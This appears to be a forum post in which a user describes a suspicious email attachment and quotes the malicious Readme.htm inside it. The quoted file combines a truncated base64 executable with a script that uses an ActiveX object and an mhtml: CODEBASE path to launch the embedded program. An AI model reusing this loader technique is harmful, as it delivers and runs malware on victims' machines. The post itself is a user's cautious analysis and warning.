Recieved A Strange File? thoughts
Hi Guys,
Recieved a strange e-mail tonight..
Addressed as from Admin..
Subject: Newsletter
Attachment: Readme.zip (size 1.2k)
MEssage reads:
Quote:
Hello , ++und3rtak3rs=email addy-removed++
New windows bug was detected , details in readme.htm file (attached) !
This is not spam ! , you get this letter because you are member of
www.security.org
First: Security.ORG is a locksmiths organisation.. (well that is what I turned up when I keyed the url) So why the f are they emailing a Windows Bug warning?
Second: I haven't subscribed to this mob's newsletters.. shud I need to learn to pick locks better (mind they nearly had me..Glad I checked the Website out)
[b]Third.. why is the message in a ZIP file? esp when the file is only 1.2k in size?
Next thought I would get my Offline machine to check the file..
The contents of the Zip file was "Readme.htm"
Viewing the contents of the file useing the View feature in Winrar:
Quote:
MIME-Version: 1.0
Content-Location:file:///aaa.exe
Content-Transfer-Encoding: base64
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAA
----64 or so lines removed--
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
<body bgcolor=black scroll=no><script>
function f()
{s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));path=unescape(path);
document.write('<center><font color=red size=+5>Please wait loading message ..... <body scroll=no bgcolor=black><object classid="clsid:11111111-1111-1111-1111" CODEBASE="mhtml:'+path+'\\readme.htm!file:///aaa.exe"></object>')}
setTimeout('f()',3000)</script>
great this wants to run an executable.. and it seems to be in the email?
am I right... anyone else seen this before?
Cheers
BTW.. I will see what happens when executed...
hmmm.. my security settings prevent the execution of Activex Controls..hmmm
perhaps I am glad I am not a locksmith...
I still wonder why I can't use Norton or McAfee to remove this flu I have..